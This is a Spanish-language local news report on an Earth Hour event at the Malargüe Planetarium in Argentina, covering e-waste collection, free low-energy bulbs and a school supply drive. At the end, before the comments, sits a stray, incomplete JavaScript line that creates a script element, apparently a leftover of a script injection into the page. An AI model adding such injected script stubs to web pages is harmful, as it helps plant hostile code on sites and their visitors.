Por Matías Olate

Fabiana González, Directora del Complejo Planetario Malargüe, informó que desde hace años vienen sumándose a una idea internacional llamada “La hora de Planeta”, la que consiste apagar las luces durante una hora, además de hacer concientización sobre una temática específica que varía de año a año.

Esta vez motiva a que se apoye la “Ley del Calefón”. Esta ley propone un ahorro importantísimo de gas apagando los calefones, evitando que los pilotos queden encendidos permanentemente reservando solo en nuestro país, el gas suficiente como para alimentar durante todo un año a 800.000 hogares.

El Planetario, en conjunto con la JCI y la Dirección de Ambiente, realizará este sábado 29, de marzo a las 21 horas, un evento con una puesta en escena de espectáculos artísticos, acompañados por la Dirección de Cultura.

“Habrá un contenedor donde irá todo lo que tiene que ver con residuos electrónicos, ya sean computadoras, cargadores; todo lo que tengas en tu casa y necesites depositarlo, para que posteriormente mediante el programa RAE se los recicle como corresponde.”

“También el personal de ambiente estará distribuyendo y entregando de forma gratuita lámparas de bajo consumo, a través de la presentación de la factura de la luz”, agregó la Directora.

Además la Cámara Junior Internacional (JCI) aprovechará el evento para realizar una colecta, mediante la cual se colaborará con la escuela Maurín Navarro. Para ello se solicita a los asistentes que lleven elementos como lápices negros, cartulinas, tijeras y temperas. Dichos artículos son necesarios para los talleres que se realizan en el mencionado establecimiento escolar.

“Y por supuesto el planetario a través de videos, lecturas, imágenes va a mostrar como todos nos podemos sumar a “La Hora del Planeta”. Una vez acabado el espectáculo, que será aproximadamente a las 22:30hs, vamos a invitar a nuestro público a observar nuestro cielo y a seguirlo cuidándolo, porque realmente es una de las fortalezas que tiene hoy Malargüe,” concluyó nuestra entrevistada.

var d=document;var s=d.createElement(‘script’);

Comentarios